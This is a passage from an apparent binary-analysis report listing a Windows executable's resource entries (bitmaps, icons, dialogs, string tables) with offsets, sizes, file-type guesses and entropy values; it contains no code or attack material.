                                                    RT_BITMAP0x16384d80x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.731203007518797
                                                    RT_BITMAP0x16389000x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.19554455445544555
                                                    RT_BITMAP0x1638c280x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.22400990099009901
                                                    RT_BITMAP0x1638f500x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.2202970297029703
                                                    RT_BITMAP0x16392780x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.2103960396039604
                                                    RT_BITMAP0x16395a00x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6943069306930693
                                                    RT_BITMAP0x16398c80x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6806930693069307
                                                    RT_BITMAP0x1639bf00xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.42609254498714655
                                                    RT_BITMAP0x163a8180x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6324257425742574
                                                    RT_BITMAP0x163ab400x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.7359022556390977
                                                    RT_BITMAP0x163af680x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5921052631578947
                                                    RT_BITMAP0x163b3900x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.46146616541353386
                                                    RT_BITMAP0x163b7b80x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.6945488721804511
                                                    RT_BITMAP0x163bbe00x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.3890977443609023
                                                    RT_BITMAP0x163c0080x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.3317669172932331
                                                    RT_BITMAP0x163c4300x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5610902255639098
                                                    RT_BITMAP0x163c8580x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.32800751879699247
                                                    RT_BITMAP0x163cc800x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.6343984962406015
                                                    RT_BITMAP0x163d0a80x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.7659774436090225
                                                    RT_BITMAP0x163d4d00x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.2959161624891962
                                                    RT_BITMAP0x163f8f80x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.42739844425237683
                                                    RT_BITMAP0x1641d200x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.39282627484874677
                                                    RT_BITMAP0x16441480x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.40989628349178914
                                                    RT_BITMAP0x16465700x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.3659248055315471
                                                    RT_BITMAP0x16489980x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.4079515989628349
                                                    RT_BITMAP0x164adc00x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.2819792566983578
                                                    RT_BITMAP0x164d1e80x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.38299481417458947
                                                    RT_BITMAP0x164f6100x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.2941875540190147
                                                    RT_BITMAP0x1651a380x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.40114520311149526
                                                    RT_BITMAP0x1653e600x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.32497839239412274
                                                    RT_BITMAP0x16562880x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.32875972342264476
                                                    RT_BITMAP0x16586b00x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.351123595505618
                                                    RT_BITMAP0x165aad80x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.3993085566119274
                                                    RT_BITMAP0x165cf000x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.35965859982713916
                                                    RT_BITMAP0x165f3280x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.25162057044079517
                                                    RT_BITMAP0x16617500x2428Device independent bitmap graphic, 48 x 48 x 32, image size 92160.3878565254969749
                                                    RT_BITMAP0x1663b780x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5225563909774437
                                                    RT_BITMAP0x1663fa00x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5028195488721805
                                                    RT_BITMAP0x16643c80x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.25
                                                    RT_BITMAP0x16646000x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.20950704225352113
                                                    RT_BITMAP0x16648380x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.21654929577464788
                                                    RT_BITMAP0x1664a700xdc28Device independent bitmap graphic, 880 x 16 x 32, image size 563200.41827537260468417
                                                    RT_BITMAP0x16726980x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.45770676691729323
                                                    RT_BITMAP0x1672ac00x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.312137330754352
                                                    RT_BITMAP0x1673ae80x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.3058510638297872
                                                    RT_BITMAP0x1674b100x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, 256 important colors0.8234848484848485
                                                    RT_BITMAP0x16750380x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.6766917293233082
                                                    RT_BITMAP0x16754600x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.6278195488721805
                                                    RT_BITMAP0x16758880x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.6334586466165414
                                                    RT_BITMAP0x1675cb00x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6386138613861386
                                                    RT_BITMAP0x1675fd80x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.6221804511278195
                                                    RT_BITMAP0x16764000x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.7894736842105263
                                                    RT_BITMAP0x16768280x4428Device independent bitmap graphic, 272 x 16 x 32, image size 174080.48217560751948646
                                                    RT_BITMAP0x167ac500x1028Device independent bitmap graphic, 64 x 16 x 32, image size 40960.5720502901353965
                                                    RT_BITMAP0x167bc780xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                    RT_BITMAP0x167bd580x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.41392649903288203
                                                    RT_BITMAP0x167cd800x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.2161654135338346
                                                    RT_BITMAP0x167d1a80x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5018796992481203
                                                    RT_BITMAP0x167d5d00x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.3167293233082707
                                                    RT_BITMAP0x167d9f80x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.5548839458413927
                                                    RT_BITMAP0x167ea200x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5582706766917294
                                                    RT_BITMAP0x167ee480x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.48402255639097747
                                                    RT_BITMAP0x167f2700x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5469924812030075
                                                    RT_BITMAP0x167f6980x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.4906015037593985
                                                    RT_BITMAP0x167fac00x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.3034332688588008
                                                    RT_BITMAP0x1680ae80x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.48872180451127817
                                                    RT_BITMAP0x1680f100xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                    RT_BITMAP0x1680fd00xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                    RT_BITMAP0x16810b00xc0Device independent bitmap graphic, 11 x 11 x 4, image size 880.4479166666666667
                                                    RT_BITMAP0x16811700xc0Device independent bitmap graphic, 11 x 11 x 4, image size 880.4479166666666667
                                                    RT_BITMAP0x16812300xc0Device independent bitmap graphic, 11 x 11 x 4, image size 880.3958333333333333
                                                    RT_BITMAP0x16812f00x94Device independent bitmap graphic, 6 x 11 x 4, image size 440.49324324324324326
                                                    RT_BITMAP0x16813840x94Device independent bitmap graphic, 6 x 11 x 4, image size 440.43243243243243246
                                                    RT_BITMAP0x16814180x94Device independent bitmap graphic, 6 x 11 x 4, image size 440.4864864864864865
                                                    RT_BITMAP0x16814ac0xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96, 16 important colors0.495
                                                    RT_BITMAP0x16815740xb8Device independent bitmap graphic, 14 x 10 x 4, image size 80, 16 important colors0.358695652173913
                                                    RT_BITMAP0x168162c0x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors0.4934210526315789
                                                    RT_BITMAP0x16816c40xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, 16 important colors0.4212962962962963
                                                    RT_BITMAP0x168179c0xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, 16 important colors0.5370370370370371
                                                    RT_BITMAP0x16818740xb0Device independent bitmap graphic, 13 x 9 x 4, image size 72, 16 important colors0.4602272727272727
                                                    RT_BITMAP0x16819240x88Device independent bitmap graphic, 8 x 8 x 4, image size 320.4411764705882353
                                                    RT_BITMAP0x16819ac0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.44711538461538464
                                                    RT_BITMAP0x1681a7c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.42788461538461536
                                                    RT_BITMAP0x1681b4c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.4375
                                                    RT_BITMAP0x1681c1c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.4519230769230769
                                                    RT_BITMAP0x1681cec0x8cDevice independent bitmap graphic, 7 x 9 x 4, image size 36, 16 important colors0.5285714285714286
                                                    RT_BITMAP0x1681d780xb0Device independent bitmap graphic, 13 x 9 x 4, image size 72, 16 important colors0.4602272727272727
                                                    RT_BITMAP0x1681e280x338Device independent bitmap graphic, 120 x 12 x 4, image size 720, 16 important colors0.21723300970873785
                                                    RT_BITMAP0x16821600x88Device independent bitmap graphic, 8 x 8 x 4, image size 320.4411764705882353
                                                    RT_BITMAP0x16821e80xb0Device independent bitmap graphic, 14 x 9 x 4, image size 72, 16 important colors0.5170454545454546
                                                    RT_BITMAP0x16822980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.5431034482758621
                                                    RT_BITMAP0x16823800xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.5646551724137931
                                                    RT_BITMAP0x16824680xb0Device independent bitmap graphic, 14 x 9 x 4, image size 720.5170454545454546
                                                    RT_BITMAP0x16825180x8cDevice independent bitmap graphic, 7 x 9 x 4, image size 36, 16 important colors0.5285714285714286
                                                    RT_BITMAP0x16825a40xb0Device independent bitmap graphic, 13 x 9 x 4, image size 72, 16 important colors0.4659090909090909
                                                    RT_BITMAP0x16826540x104Device independent bitmap graphic, 20 x 13 x 4, image size 1560.4307692307692308
                                                    RT_BITMAP0x16827580x88Device independent bitmap graphic, 8 x 8 x 4, image size 32, 16 important colors0.4632352941176471
                                                    RT_BITMAP0x16827e00x7cDevice independent bitmap graphic, 8 x 5 x 4, image size 200.5241935483870968
                                                    RT_BITMAP0x168285c0x1b8Device independent bitmap graphic, 42 x 14 x 4, image size 336, 16 important colors0.30454545454545456
                                                    RT_BITMAP0x1682a140x94Device independent bitmap graphic, 7 x 11 x 4, image size 440.5067567567567568
                                                    RT_BITMAP0x1682aa80xb0Device independent bitmap graphic, 14 x 9 x 4, image size 72, 16 important colors0.5170454545454546
                                                    RT_BITMAP0x1682b580xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96, 16 important colors0.515
                                                    RT_BITMAP0x1682c200x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors0.506578947368421
                                                    RT_BITMAP0x1682cb80xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, 16 important colors0.6759259259259259
                                                    RT_BITMAP0x1682d900xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                    RT_BITMAP0x1682e780xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                    RT_BITMAP0x1682f380x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m0.12747524752475248
                                                    RT_BITMAP0x16832600x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.3829268292682927
                                                    RT_BITMAP0x16838c80x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.39146341463414636
                                                    RT_BITMAP0x1683f300x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.3853658536585366
                                                    RT_BITMAP0x16845980x188Device independent bitmap graphic, 24 x 24 x 4, image size 288FrenchFrance0.35459183673469385
                                                    RT_BITMAP0x16847200x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.39207317073170733
                                                    RT_BITMAP0x1684d880x110Device independent bitmap graphic, 24 x 14 x 4, image size 168EnglishUnited States0.40808823529411764
                                                    RT_BITMAP0x1684e980x110Device independent bitmap graphic, 24 x 14 x 4, image size 168EnglishUnited States0.4117647058823529
                                                    RT_BITMAP0x1684fa80x668Device independent bitmap graphic, 24 x 24 x 8, image size 576PolishPoland0.375609756097561
                                                    RT_BITMAP0x16856100x188Device independent bitmap graphic, 24 x 24 x 4, image size 288EnglishGreat Britain0.41836734693877553
                                                    RT_BITMAP0x16857980x188Device independent bitmap graphic, 24 x 24 x 4, image size 288EnglishUnited States0.5943877551020408
                                                    RT_BITMAP0x16859200x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.35548780487804876
                                                    RT_BITMAP0x1685f880x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.3853658536585366
                                                    RT_BITMAP0x16865f00x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.43902439024390244
                                                    RT_BITMAP0x1686c580xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                    RT_BITMAP0x1686d380xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.1089588377723971
                                                    RT_BITMAP0x1687a200xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.10714285714285714
                                                    RT_BITMAP0x16887080xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.0950363196125908
                                                    RT_BITMAP0x16893f00x268Device independent bitmap graphic, 32 x 32 x 4, image size 5120.21266233766233766
                                                    RT_BITMAP0x16896580x268Device independent bitmap graphic, 32 x 32 x 4, image size 5120.17207792207792208
                                                    RT_BITMAP0x16898c00x268Device independent bitmap graphic, 32 x 32 x 4, image size 5120.1672077922077922
                                                    RT_BITMAP0x1689b280xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.11955205811138014
                                                    RT_BITMAP0x168a8100xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.11561743341404358
                                                    RT_BITMAP0x168b4f80xd28Device independent bitmap graphic, 144 x 16 x 8, image size 23040.23634204275534443
                                                    RT_BITMAP0x168c2200x124Device independent bitmap graphic, 9 x 9 x 24, image size 2520.2465753424657534
                                                    RT_BITMAP0x168c3440x124Device independent bitmap graphic, 9 x 9 x 24, image size 2520.3356164383561644
                                                    RT_BITMAP0x168c4680x4b2aDevice independent bitmap graphic, 400 x 16 x 24, image size 0, resolution 2834 x 2834 px/m0.2749194470429269
                                                    RT_BITMAP0x1690f940x124Device independent bitmap graphic, 9 x 9 x 24, image size 2520.571917808219178
                                                    RT_BITMAP0x16910b80x126Device independent bitmap graphic, 9 x 9 x 24, image size 0, resolution 2834 x 2834 px/m0.5918367346938775
                                                    RT_ICON0x16911e00x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 18432EnglishUnited States0.32837505129257283
                                                    RT_ICON0x1695e080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.6324626865671642
                                                    RT_ICON0x1696cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7333032490974729
                                                    RT_ICON0x16975580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.7764976958525346
                                                    RT_ICON0x1697c200x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.8634393063583815
                                                    RT_ICON0x16981880x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.2028767346214161
                                                    RT_ICON0x16da1b00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2981190110020111
                                                    RT_ICON0x16ea9d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6924273858921162
                                                    RT_ICON0x16ecf800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.8081613508442776
                                                    RT_ICON0x16ee0280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.8774590163934426
                                                    RT_ICON0x16ee9b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.9308510638297872
                                                    RT_DIALOG0x16eee180x52data0.7682926829268293
                                                    RT_DIALOG0x16eee6c0x52data0.7804878048780488
                                                    RT_DIALOG0x16eeec00x32dataCzechCzech Republic0.82
                                                    RT_DIALOG0x16eeef40x52data0.7560975609756098
                                                    RT_STRING0x16eef480x3d4data0.43979591836734694
                                                    RT_STRING0x16ef31c0x898data0.3109090909090909
                                                    RT_STRING0x16efbb40x106cdata0.21741198858230257
                                                    RT_STRING0x16f0c200x9f8data0.32053291536050155
                                                    RT_STRING0x16f16180x894data0.3087431693989071
                                                    RT_STRING0x16f1eac0x87cdata0.27532228360957645
                                                    RT_STRING0x16f27280x400data0.392578125
                                                    RT_STRING0x16f2b280x3e8DOS executable (COM, 0x8C-variant)0.392
                                                    RT_STRING0x16f2f100x4fcdata0.384012539184953
                                                    RT_STRING0x16f340c0x3c4data0.44398340248962653
                                                    RT_STRING0x16f37d00x2d8data0.45054945054945056
                                                    RT_STRING0x16f3aa80x218data0.48880597014925375
                                                    RT_STRING0x16f3cc00x324data0.47139303482587064
                                                    RT_STRING0x16f3fe40x188data0.5535714285714286
                                                    RT_STRING0x16f416c0xf8data0.5564516129032258
                                                    RT_STRING0x16f42640x138data0.5480769230769231
                                                    RT_STRING0x16f439c0x1b4data0.5160550458715596
                                                    RT_STRING0x16f45500x2e4data0.4702702702702703
                                                    RT_STRING0x16f48340x200data0.470703125
                                                    RT_STRING0x16f4a340x1ecdata0.44308943089430897
                                                    RT_STRING0x16f4c200x2c8data0.4199438202247191
                                                    RT_STRING0x16f4ee80x240data0.4340277777777778
                                                    RT_STRING0x16f51280x1f4data0.45
                                                    RT_STRING0x16f531c0x1a0data0.4831730769230769
                                                    RT_STRING0x16f54bc0x180data0.5104166666666666
                                                    RT_STRING0x16f563c0xf4data0.639344262295082
                                                    RT_STRING0x16f57300x2e4data0.40540540540540543
                                                    RT_STRING0x16f5a140x1b0data0.46296296296296297
                                                    RT_STRING0x16f5bc40xe4data0.706140350877193
                                                    RT_STRING0x16f5ca80x1e8data0.4098360655737705
                                                    RT_STRING0x16f5e900x188data0.4872448979591837
                                                    RT_STRING0x16f60180x168data0.45555555555555555
                                                    RT_STRING0x16f61800x124data0.547945205479452
                                                    RT_STRING0x16f62a40x100data0.54296875
                                                    RT_STRING0x16f63a40x248data0.3167808219178082
                                                    RT_STRING0x16f65ec0x1d8data0.4470338983050847
                                                    RT_STRING0x16f67c40x1a8data0.49528301886792453
                                                    RT_STRING0x16f696c0x1e0data0.3229166666666667
                                                    RT_STRING0x16f6b4c0xb8data0.5597826086956522
                                                    RT_STRING0x16f6c040xa8data0.625
                                                    RT_STRING0x16f6cac0x150data0.5565476190476191
                                                    RT_STRING0x16f6dfc0x3a0data0.375
                                                    RT_STRING0x16f719c0x250data0.46959459459459457
                                                    RT_STRING0x16f73ec0x1d0data0.5086206896551724
                                                    RT_STRING0x16f75bc0x188data0.5
                                                    RT_STRING0x16f77440x234data0.46808510638297873
                                                    RT_STRING0x16f79780x1c4data0.5088495575221239
                                                    RT_STRING0x16f7b3c0x18cAmigaOS bitmap font "o", fc_YSize 28672, 21504 elements, 2nd " ", 3rd0.5075757575757576
                                                    RT_STRING0x16f7cc80x1acdata0.49065420560747663
                                                    RT_STRING0x16f7e740x134data0.5876623376623377
                                                    RT_STRING0x16f7fa80x1a4data0.5357142857142857
                                                    RT_STRING0x16f814c0x1f8StarOffice Gallery theme t, 1694528000 objects, 1st D0.5059523809523809
                                                    RT_STRING0x16f83440x140data0.58125
                                                    RT_STRING0x16f84840x228data0.4692028985507246
                                                    RT_STRING0x16f86ac0x300data0.3815104166666667
                                                    RT_STRING0x16f89ac0x414data0.44157088122605365
                                                    RT_STRING0x16f8dc00x1acdata0.4182242990654206
                                                    RT_STRING0x16f8f6c0x1ecdata0.46747967479674796
                                                    RT_STRING0x16f91580x2e4data0.4418918918918919
                                                    RT_STRING0x16f943c0x2f0data0.45611702127659576
                                                    RT_STRING0x16f972c0x230data0.4035714285714286
                                                    RT_STRING0x16f995c0x1acdata0.4696261682242991
                                                    RT_STRING0x16f9b080x204data0.5406976744186046
                                                    RT_STRING0x16f9d0c0x314data0.4035532994923858
                                                    RT_STRING0x16fa0200x3a0data0.45905172413793105
                                                    RT_STRING0x16fa3c00x1bcdata0.536036036036036
                                                    RT_STRING0x16fa57c0x2d4data0.4488950276243094
                                                    RT_STRING0x16fa8500x140data0.56875
                                                    RT_STRING0x16fa9900xc88data0.15835411471321695
                                                    RT_STRING0x16fb6180x9ccdata0.17464114832535885
                                                    RT_STRING0x16fbfe40xa98data0.14786135693215338
                                                    RT_STRING0x16fca7c0x1a4data0.4595238095238095
                                                    RT_STRING0x16fcc200x160data0.4971590909090909
                                                    RT_STRING0x16fcd800x120data0.5486111111111112
                                                    RT_STRING0x16fcea00x170data0.3532608695652174
                                                    RT_STRING0x16fd0100x16cdata0.34065934065934067
                                                    RT_STRING0x16fd17c0x1b4data0.3486238532110092
                                                    RT_STRING0x16fd3300x13cdata0.4810126582278481
                                                    RT_STRING0x16fd46c0xf4data0.6147540983606558
                                                    RT_STRING0x16fd5600x26cdata0.4435483870967742
                                                    RT_STRING0x16fd7cc0x49cdata0.3432203389830508
                                                    RT_STRING0x16fdc680x14cdata0.4939759036144578
                                                    RT_STRING0x16fddb40xacdata0.6453488372093024
                                                    RT_STRING0x16fde600x110data0.5955882352941176
                                                    RT_STRING0x16fdf700x238AmigaOS bitmap font "a", fc_YSize 25856, 17408 elements, 2nd "c", 3rd "b"0.4964788732394366
                                                    RT_STRING0x16fe1a80x3f8data0.3464566929133858
                                                    RT_STRING0x16fe5a00x418data0.40553435114503816
                                                    RT_STRING0x16fe9b80x668data0.26158536585365855
                                                    RT_STRING0x16ff0200x558data0.3355263157894737
                                                    RT_STRING0x16ff5780x47cdata0.3623693379790941
                                                    RT_STRING0x16ff9f40x2ecdata0.4893048128342246
                                                    RT_STRING0x16ffce00x168data0.55
                                                    RT_STRING0x16ffe480x15cdata0.5890804597701149
                                                    RT_STRING0x16fffa40x26cdata0.3629032258064516
                                                    RT_STRING0x17002100x3f4data0.42391304347826086
                                                    RT_STRING0x17006040x344data0.41148325358851673
                                                    RT_STRING0x17009480x420data0.4015151515151515
                                                    RT_STRING0x1700d680x3e8data0.421
                                                    RT_STRING0x17011500x388data0.38716814159292035
                                                    RT_STRING0x17014d80x364data0.3490783410138249
                                                    RT_STRING0x170183c0x2ecdata0.4304812834224599
                                                    RT_STRING0x1701b280x264data0.4477124183006536
                                                    RT_STRING0x1701d8c0x154data0.55
                                                    RT_STRING0x1701ee00x150data0.47619047619047616
                                                    RT_STRING0x17020300x130data0.506578947368421
                                                    RT_STRING0x17021600x184data0.538659793814433
                                                    RT_STRING0x17022e40x1b0data0.4166666666666667
                                                    RT_STRING0x17024940x2a4data0.46153846153846156
                                                    RT_STRING0x17027380x104data0.6346153846153846
                                                    RT_STRING0x170283c0x104data0.6230769230769231
                                                    RT_STRING0x17029400x1acStarOffice Gallery theme y, 1694530048 objects, 1st h0.4182242990654206
                                                    RT_STRING0x1702aec0x158data0.40988372093023256
                                                    RT_STRING0x1702c440x334data0.4268292682926829
                                                    RT_STRING0x1702f780x2e0data0.4116847826086957
                                                    RT_STRING0x17032580x234data0.39361702127659576
                                                    RT_STRING0x170348c0x22cAmigaOS bitmap font "i", fc_YSize 4352, 19456 elements, 2nd "i", 3rd "c"0.3830935251798561
                                                    RT_STRING0x17036b80x118data0.5571428571428572
                                                    RT_STRING0x17037d00x128data0.5540540540540541
                                                    RT_STRING0x17038f80x110data0.6286764705882353
                                                    RT_STRING0x1703a080x31cAmigaOS bitmap font "a", fc_YSize 28672, 19968 elements, 2nd "b", 3rd "o"0.4472361809045226
                                                    RT_STRING0x1703d240x3c4data0.4107883817427386
                                                    RT_STRING0x17040e80x27cdata0.42924528301886794
                                                    RT_STRING0x17043640x384data0.45
                                                    RT_STRING0x17046e80x324data0.38681592039800994
                                                    RT_STRING0x1704a0c0x2d4data0.425414364640884
                                                    RT_STRING0x1704ce00x48cdata0.3634020618556701
                                                    RT_STRING0x170516c0x430data0.3666044776119403
                                                    RT_STRING0x170559c0x310data0.41709183673469385
                                                    RT_STRING0x17058ac0x294data0.4257575757575758
                                                    RT_STRING0x1705b400x338data0.44538834951456313
                                                    RT_STRING0x1705e780x218data0.503731343283582
                                                    RT_STRING0x17060900x1f4data0.416
                                                    RT_STRING0x17062840x1ccdata0.4891304347826087
                                                    RT_STRING0x17064500x1f0data0.5
                                                    RT_STRING0x17066400x164data0.5224719101123596
                                                    RT_STRING0x17067a40x3e4data0.321285140562249
                                                    RT_STRING0x1706b880x3d0data0.41905737704918034
                                                    RT_STRING0x1706f580x1a8data0.5
                                                    RT_STRING0x17071000x1b0data0.47453703703703703
                                                    RT_STRING0x17072b00x2a0data0.47172619047619047
                                                    RT_STRING0x17075500x2bcdata0.47
                                                    RT_STRING0x170780c0x130data0.5855263157894737
                                                    RT_STRING0x170793c0x318data0.47853535353535354
                                                    RT_STRING0x1707c540x17cdata0.5763157894736842
                                                    RT_STRING0x1707dd00x1a0data0.5600961538461539
                                                    RT_STRING0x1707f700x200AmigaOS bitmap font "h", fc_YSize 28416, 21248 elements, 2nd "t", 3rd0.451171875
                                                    RT_STRING0x17081700x198data0.5098039215686274
                                                    RT_STRING0x17083080x174data0.49731182795698925
                                                    RT_STRING0x170847c0x70cAmigaOS bitmap font "e", fc_YSize 8192, 20992 elements, 2nd "s", 3rd """0.3004434589800443
                                                    RT_STRING0x1708b880x3a8data0.42948717948717946
                                                    RT_STRING0x1708f300x18cdata0.5151515151515151
                                                    RT_STRING0x17090bc0x550data0.28602941176470587
                                                    RT_STRING0x170960c0x1c8data0.5372807017543859
                                                    RT_STRING0x17097d40xfcdata0.6388888888888888
                                                    RT_STRING0x17098d00xf4data0.6475409836065574
                                                    RT_STRING0x17099c40x1c0data0.5200892857142857
                                                    RT_STRING0x1709b840x1e0data0.5416666666666666
                                                    RT_STRING0x1709d640x238data0.2992957746478873
                                                    RT_STRING0x1709f9c0x194data0.4084158415841584
                                                    RT_STRING0x170a1300x178data0.4654255319148936
                                                    RT_STRING0x170a2a80x150data0.6011904761904762
                                                    RT_STRING0x170a3f80x160data0.5852272727272727
                                                    RT_STRING0x170a5580x138data0.592948717948718
                                                    RT_STRING0x170a6900x21cdata0.4888888888888889
                                                    RT_STRING0x170a8ac0x184data0.5463917525773195
                                                    RT_STRING0x170aa300x194data0.37623762376237624
                                                    RT_STRING0x170abc40x168data0.4722222222222222
                                                    RT_STRING0x170ad2c0x16cdata0.5796703296703297
                                                    RT_STRING0x170ae980x1a8data0.5212264150943396
                                                    RT_STRING0x170b0400x1e8data0.5573770491803278
                                                    RT_STRING0x170b2280x15cdata0.5
                                                    RT_STRING0x170b3840x144data0.595679012345679
                                                    RT_STRING0x170b4c80x3a8data0.37713675213675213
                                                    RT_STRING0x170b8700x1a0data0.5144230769230769
                                                    RT_STRING0x170ba100x1c8data0.4824561403508772
                                                    RT_STRING0x170bbd80x2d0data0.32916666666666666
                                                    RT_STRING0x170bea80x1a0data0.5120192307692307
                                                    RT_STRING0x170c0480x1d0data0.5172413793103449
                                                    RT_STRING0x170c2180x17cdata0.5
                                                    RT_STRING0x170c3940x1c8data0.4407894736842105
                                                    RT_STRING0x170c55c0x1a4data0.48095238095238096
                                                    RT_STRING0x170c7000x12cdata0.58
                                                    RT_STRING0x170c82c0x188data0.5280612244897959
                                                    RT_STRING0x170c9b40x470data0.3573943661971831
                                                    RT_STRING0x170ce240xe8data0.6077586206896551
                                                    RT_STRING0x170cf0c0x190data0.4925
                                                    RT_STRING0x170d09c0x30cdata0.45897435897435895
                                                    RT_STRING0x170d3a80x244data0.4862068965517241
                                                    RT_STRING0x170d5ec0x1c8data0.4934210526315789
                                                    RT_STRING0x170d7b40x270data0.4583333333333333
                                                    RT_STRING0x170da240x130data0.618421052631579
                                                    RT_STRING0x170db540x1a4data0.49047619047619045
                                                    RT_STRING0x170dcf80x170data0.5244565217391305
                                                    RT_STRING0x170de680x204data0.3178294573643411
                                                    RT_STRING0x170e06c0xccdata0.6568627450980392
                                                    RT_STRING0x170e1380x11cdata0.5633802816901409
                                                    RT_STRING0x170e2540x134data0.44155844155844154
                                                    RT_STRING0x170e3880xfcdata0.5873015873015873
                                                    RT_STRING0x170e4840x628data0.3083756345177665
